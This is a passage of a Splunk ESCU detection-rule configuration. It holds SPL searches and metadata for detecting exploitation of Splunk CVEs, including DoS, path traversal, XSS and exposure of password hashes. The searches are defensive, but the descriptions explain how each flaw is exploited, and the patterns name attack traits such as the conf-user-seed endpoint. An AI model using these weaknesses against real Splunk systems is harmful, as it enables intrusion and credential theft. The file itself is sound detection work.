["CVE-2022-37439"], "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search allows operator to identify Splunk search app crashes resulting from specially crafted ZIP file using file monitoring that affects UF versions 8.1.11 and 8.2 versions below 8.2.7.1. It is not possible to detect Zip Bomb attack before crash. This search will provide Universal Forwarder errors from uploaded binary files (zip compression) which are used for this attack. If an analyst sees results from this search we suggest you investigate and triage what zip file was uploaded, zip compressed files may have different extensions. action.notable.param.rule_title = Splunk Endpoint Denial of Service DoS Zip Bomb action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd` component=FileClassifierManager event_message=*invalid* event_message=*binary* |stats count by host component event_message | `splunk_endpoint_denial_of_service_dos_zip_bomb_filter` [ESCU - Splunk Enterprise KV Store Incorrect Authorization - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions below 9.0.8 and 9.1.3, Splunk app key value store KV Store improperly handles permissions for users using the REST application programming interface (API). This can potentially result in the deletion of KV Store collections. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise versions below 9.0.8 and 9.1.3, Splunk app key value store KV Store improperly handles permissions for users using the REST application programming interface (API). This can potentially result in the deletion of KV Store collections. action.escu.how_to_implement = Requires access to internal indexes and REST API enabled instances. action.escu.known_false_positives = This is a hunting search and will produce false positives. Operator must follow results into instances where curl requests coming from actual users may indicate intent of exploitation. action.escu.creation_date = 2024-01-18 action.escu.modification_date = 2024-01-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Enterprise KV Store Incorrect Authorization - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Enterprise KV Store Incorrect Authorization - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2024-23675"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkda` uri=/servicesNS/nobody/search/admin/collections-conf/_reload status=2* method="POST" user=* file=_reload | stats count min(_time) as firstTime max(_time) as lastTime values(status) as status by host clientip file method | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_enterprise_kv_store_incorrect_authorization_filter` [ESCU - Splunk Enterprise Windows Deserialization File Partition - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data resulting in the unsafe deserialization of untrusted data. This vulnerability only affects Splunk Enterprise for Windows. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data resulting in the unsafe deserialization of untrusted data. This vulnerability only affects Splunk Enterprise for Windows. action.escu.how_to_implement = Requires access to internal indexes. This detection search will display irregular path file execution, which will display exploit attempts. Only applies to Microsoft Windows Splunk versions. action.escu.known_false_positives = Irregular path with files that may be purposely called for benign reasons may produce false positives. action.escu.creation_date = 2024-01-18 action.escu.modification_date = 2024-01-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Enterprise Windows Deserialization File Partition - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = Possible Windows Deserialization exploitation via irregular path file against $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Enterprise Windows Deserialization File Partition - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2024-23678"], "impact": 100, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data resulting in the unsafe deserialization of untrusted data. This vulnerability only affects Splunk Enterprise for Windows. action.notable.param.rule_title = Splunk Enterprise Windows Deserialization File Partition action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunk_python` request_path="/en-US/app/search/C:\\Program" *strings* | rex "request_path=(?[^\"]+)" | rex field=file_path "[^\"]+/(?[^\"\'\s/\\\\]+)" | stats min(_time) as firstTime max(_time) as lastTime values(file_path) as file_path values(file_name) as file_name by index, sourcetype, host | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_enterprise_windows_deserialization_file_partition_filter` [ESCU - Splunk ES DoS Investigations Manager via Investigation Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise Security (ES) versions lower than 7.1.2, an attacker can create a malformed Investigation to perform a denial of service (DoS). The malformed investigation prevents the generation and rendering of the Investigations manager until it is deleted. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise Security (ES) versions lower than 7.1.2, an attacker can create a malformed Investigation to perform a denial of service (DoS). The malformed investigation prevents the generation and rendering of the Investigations manager until it is deleted. action.escu.how_to_implement = This search requires access to internal indexes. Only affects Splunk Enterprise Security versions lower than 7.1.2. action.escu.known_false_positives = The vulnerability requires an authenticated session and access to create an Investigation. It only affects the availability of the Investigations manager, but without the manager, the Investigations functionality becomes unusable for most users. This search gives the exact offending event. action.escu.creation_date = 2024-01-04 action.escu.modification_date = 2024-01-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk ES DoS Investigations Manager via Investigation Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise Security"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = Denial of Service Attack against Splunk ES Investigation Manager by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk ES DoS Investigations Manager via Investigation Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2024-22165"], "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = In Splunk Enterprise Security (ES) versions lower than 7.1.2, an attacker can create a malformed Investigation to perform a denial of service (DoS). The malformed investigation prevents the generation and rendering of the Investigations manager until it is deleted. action.notable.param.rule_title = Splunk ES DoS Investigations Manager via Investigation Creation action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_investigation_rest_handler` method=put msg=*investigation* status=error | stats count min(_time) as firstTime max(_time) as lastTime by user method msg | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_es_dos_investigations_manager_via_investigation_creation_filter` [ESCU - Splunk ES DoS Through Investigation Attachments - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise Security (ES) versions below 7.1.2, an attacker can use investigation attachments to perform a denial of service (DoS) to the Investigation. The attachment endpoint does not properly limit the size of the request which lets an attacker cause the Investigation to become inaccessible. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise Security (ES) versions below 7.1.2, an attacker can use investigation attachments to perform a denial of service (DoS) to the Investigation. The attachment endpoint does not properly limit the size of the request which lets an attacker cause the Investigation to become inaccessible. action.escu.how_to_implement = This search requires access to internal indexes, only affects Enterprise Security versions below 7.1.2. action.escu.known_false_positives = This search will show the exact DoS event via error message and investigation id. The error however does not point exactly at the uploader as any users associated with the investigation will be affected. Operator must investigate using investigation id the possible origin of the malicious upload. Attack only affects specific investigation not the investigation manager. action.escu.creation_date = 2024-01-04 action.escu.modification_date = 2024-01-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk ES DoS Through Investigation Attachments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise Security"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = Denial of Service detected at Splunk ES affecting $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk ES DoS Through Investigation Attachments - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2024-22164"], "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = In Splunk Enterprise Security (ES) versions below 7.1.2, an attacker can use investigation attachments to perform a denial of service (DoS) to the Investigation. The attachment endpoint does not properly limit the size of the request which lets an attacker cause the Investigation to become inaccessible. action.notable.param.rule_title = Splunk ES DoS Through Investigation Attachments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_investigation_rest_handler` status=error object=investigation | stats min(_time) as firstTime max(_time) as lastTime values(status) as status values(msg) as msg values(id) as investigation_id by user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_es_dos_through_investigation_attachments_filter` [ESCU - Splunk HTTP Response Splitting Via Rest SPL Command - Rule] action.escu = 0 action.escu.enabled = 1 description = A low-privileged user, using a specially crafted search command, can trigger an HTTP response splitting vulnerability with the rest SPL command that lets them potentially access other REST endpoints in the system arbitrarily, including accessing restricted content such as password files. This is because the user is able to inject the rest SPL command into the q parameter of an HTTP GET web request. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The attacker cannot exploit the vulnerability at will. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027.006"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = A low-privileged user, using a specially crafted search command, can trigger an HTTP response splitting vulnerability with the rest SPL command that lets them potentially access other REST endpoints in the system arbitrarily, including accessing restricted content such as password files. This is because the user is able to inject the rest SPL command into the q parameter of an HTTP GET web request. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The attacker cannot exploit the vulnerability at will. action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _audit index. This search may assist in detecting possible http response splitting exploitation attemptss. action.escu.known_false_positives = This search may have produce false positives as malformed or erroneous requests made to this endpoint may be executed willingly or erroneously by operators. action.escu.creation_date = 2023-05-23 action.escu.modification_date = 2023-05-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk HTTP Response Splitting Via Rest SPL Command - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk HTTP Response Splitting Via Rest SPL Command - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027.006"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `audit_searches` AND search IN ("*|*rest*POST*","*|*rest*PUT*","*|*rest*PATCH*","*|*rest*DELETE*") AND NOT search="*audit_searches*" | table user info has_error_msg search _time | `splunk_http_response_splitting_via_rest_spl_command_filter` [ESCU - Splunk Improperly Formatted Parameter Crashes splunkd - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, when the INGEST\\_EVAL parameter is improperly formatted, it crashes splunkd. This hunting search provides the user, timing and number of times the crashing command was executed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]} action.escu.data_models = ["Splunk_Audit"] action.escu.eli5 = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, when the INGEST\\_EVAL parameter is improperly formatted, it crashes splunkd. This hunting search provides the user, timing and number of times the crashing command was executed. action.escu.how_to_implement = Requires access to audittrail and use of Splunk_Audit.Search_Activity datamodel. action.escu.known_false_positives = This is a hunting search it should be focused on affected products, otherwise it is likely to produce false positives. action.escu.creation_date = 2023-02-14 action.escu.modification_date = 2023-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Improperly Formatted Parameter Crashes splunkd - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = An attempt to exploit ingest eval parameter was detected from $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Splunk Improperly Formatted Parameter Crashes splunkd - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2023-22941"], "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, when the INGEST\\_EVAL parameter is improperly formatted, it crashes splunkd. This hunting search provides the user, timing and number of times the crashing command was executed. action.notable.param.rule_title = Splunk Improperly Formatted Parameter Crashes splunkd action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Splunk_Audit.Search_Activity where (Search_Activity.search="*makeresults*"AND Search_Activity.search="*ingestpreview*transforms*") Search_Activity.search_type=adhoc Search_Activity.search!="*splunk_improperly_formatted_parameter_crashes_splunkd_filter*" Search_Activity.user!=splunk-system-user by Search_Activity.search, Search_Activity.info, Search_Activity.total_run_time, Search_Activity.user, Search_Activity.search_type | `drop_dm_object_name(Search_Activity)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_improperly_formatted_parameter_crashes_splunkd_filter` [ESCU - Splunk Information Disclosure in Splunk Add-on Builder - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Add-on Builder versions below 4.1.4, the application writes sensitive information to its internal log files when you visit the Splunk Add-on Builder or when you build or edit a custom app or add-on. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Add-on Builder versions below 4.1.4, the application writes sensitive information to its internal log files when you visit the Splunk Add-on Builder or when you build or edit a custom app or add-on. action.escu.how_to_implement = This search should be run on search heads where Splunk Add-on Builder may be installed. The results of this search will conclusively show whether or not a vulnerable version of Splunk Add-on Builder is currently installed. action.escu.known_false_positives = This search is highly specific for vulnerable versions of Splunk Add-on Builder. There are no known false positives. action.escu.creation_date = 2024-01-30 action.escu.modification_date = 2024-01-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Information Disclosure in Splunk Add-on Builder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Information Disclosure in Splunk Add-on Builder - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | rest /services/apps/local | search disabled=0 core=0 label="Splunk Add-on Builder" | dedup label | search version < 4.1.4 | eval WarningMessage="Splunk Add-on Builder Versions older than v4.1.4 contain a critical vulnerability. Update to Splunk Add-on Builder v4.1.4 or higher immediately. For more information about this vulnerability, please refer to https://advisory.splunk.com/advisories/SVD-2024-0111" | table label version WarningMessage | `splunk_information_disclosure_in_splunk_add_on_builder_filter` [ESCU - Splunk list all nonstandard admin accounts - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search will enumerate all Splunk Accounts with administrative rights on this instance. It deliberately ignores the default admin account since this is assumed to be present. This search may help in a detection the Cross-Site Scripting Attack listed: In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a View allows for Cross-Site Scripting in an XML View through the 'layoutPanel' attribute in the 'module' tag. The vulnerability affects instances with Splunk Web enabled. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search will enumerate all Splunk Accounts with administrative rights on this instance. It deliberately ignores the default admin account since this is assumed to be present. This search may help in a detection the Cross-Site Scripting Attack listed: In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a View allows for Cross-Site Scripting in an XML View through the 'layoutPanel' attribute in the 'module' tag. The vulnerability affects instances with Splunk Web enabled. action.escu.how_to_implement = The user running this search is required to have a permission allowing them to dispatch REST requests to indexers (the `dispatch_rest_to_indexers` capability) in some architectures. If there have been admin account, in addition to the standard admin account, intentionally created on this server, then edit the filter macro to exclude them. action.escu.known_false_positives = It is not possible to discern from the user table whether or not users with admin rights have been created intentionally, accidentally, or as a result of exploitation. Each user with these rights should be investigated and, if legitimate, added to the filter macro above. If a user is not believed to be legitimate, then further investigation should take place. action.escu.creation_date = 2023-02-07 action.escu.modification_date = 2023-02-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk list all nonstandard admin accounts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Splunk list all nonstandard admin accounts - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-22933"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | rest splunk_server=local /services/authentication/users |search capabilities=admin* OR imported_capabilities=admin* title!=admin | table title roles capabilities splunk_server | `splunk_list_all_nonstandard_admin_accounts_filter` [ESCU - Splunk Low Privilege User Can View Hashed Splunk Password - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, a low-privilege user who holds the user role can see the hashed version of the initial user name and password for the Splunk instance by using the rest SPL command against the conf-user-seed REST endpoint. This can lead to a privilege escalation that lets the user take over the admin account on the instance. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1212"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, a low-privilege user who holds the user role can see the hashed version of the initial user name and password for the Splunk instance by using the rest SPL command against the conf-user-seed REST endpoint. This can lead to a privilege escalation that lets the user take over the admin account on the instance. action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _audit index. This detection may assist in efforts to discover attempts to access con-user-seed file content. action.escu.known_false_positives = This search may produce false positives as accounts with high privileges may access this file. Operator will need to investigate these actions in order to discern exploitation attempts. action.escu.creation_date = 2023-05-09 action.escu.modification_date = 2023-05-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Low Privilege User Can View Hashed Splunk Password - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Low Privilege User Can View Hashed Splunk Password - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1212"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_web` uri="*/servicesNS/nobody/system/configs/conf-user-seed*" | stats earliest(_time) as event_time values(method) as method values(status) as status values(clientip) as clientip values(useragent) as useragent values(file) as file by user | convert ctime(*time) | `splunk_low_privilege_user_can_view_hashed_splunk_password_filter` [ESCU - Splunk Path Traversal In Splunk App For Lookup File Edit - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, a low-privilege user with access to the Splunk App for Lookup File Editing can, with a specially crafted web request, trigger a path traversal exploit that can then be used to read and write to restricted areas of the Splunk installation directory, including but not limited to the password hash file for the instance. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1083"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, a low-privilege user with access to the Splunk App for Lookup File Editing can, with a specially crafted web request, trigger a path traversal exploit that can then be used to read and write to restricted areas of the Splunk installation directory, including but not limited to the password hash file for the instance. action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. This detection is meant for on premise environments, and if executed on internet facing servers without a WAF may produce a lot of results. This detection will not work against obfuscated path traversal requests. action.escu.known_false_positives = This search may find additional path traversal exploitation attempts or malformed requests. action.escu.creation_date = 2023-05-11 action.escu.modification_date = 2023-05-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Path Traversal In Splunk App For Lookup File Edit - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Path Traversal In Splunk App For Lookup File Edit - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1083"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkda` uri_query=*lookup_file* | table clientip uri_query lookup_file owner namespace version | stats count by clientip namespace lookup_file uri_query | `splunk_path_traversal_in_splunk_app_for_lookup_file_edit_filter` [ESCU - Persistent XSS in RapidDiag through User Interface Views - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise 9.0 versions before 9.0.4, a View allows for Cross-Site Scripting through the error message in a Base64-encoded image. The vulnerability affects instances with Splunk Web enabled. It does not affect Splunk Enterprise versions below 9.0. This search provides information on what user may have potentially added a malicious payload and what users were exposed to it. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise 9.0 versions before 9.0.4, a View allows for Cross-Site Scripting through the error message in a Base64-encoded image. The vulnerability affects instances with Splunk Web enabled. It does not affect Splunk Enterprise versions below 9.0. This search provides information on what user may have potentially added a malicious payload and what users were exposed to it. action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index action.escu.known_false_positives = This is a hunting search, it will not deobfuscate base64 payload, it provides however it will provide what user added the view artifact and what user opened it. It will require further investigation based on the information presented by this hunting search. action.escu.creation_date = 2023-02-14 action.escu.modification_date = 2023-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Persistent XSS in RapidDiag through User Interface Views - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = A potential XSS attempt has been detected from $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Persistent XSS in RapidDiag through User Interface Views - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-22932"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = In Splunk Enterprise 9.0 versions before 9.0.4, a View allows for Cross-Site Scripting through the error message in a Base64-encoded image. The vulnerability affects instances with Splunk Web enabled. It does not affect Splunk Enterprise versions below 9.0. This search provides information on what user may have potentially added a malicious payload and what users were exposed to it. action.notable.param.rule_title = Persistent XSS in RapidDiag through User Interface Views action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `audit_searches` path=/opt/splunk/etc/users/*/search/local/data/ui/views/* action=* |table user action roles info roles path | dedup user action | `persistent_xss_in_rapiddiag_through_user_interface_views_filter` [ESCU - Splunk Persistent XSS Via URL Validation Bypass W Dashboard - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions below 9.0.4, 8.2.10, and 8.1.13, a low-privileged user can bypass URL validation to perform a path traversal and access restricted and confidential information by targeting other users on the instance, including the admin user. The only affected version of bootstrap which shipped with Splunk was version 2.3.1, so the search is targeted at that version alone. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": 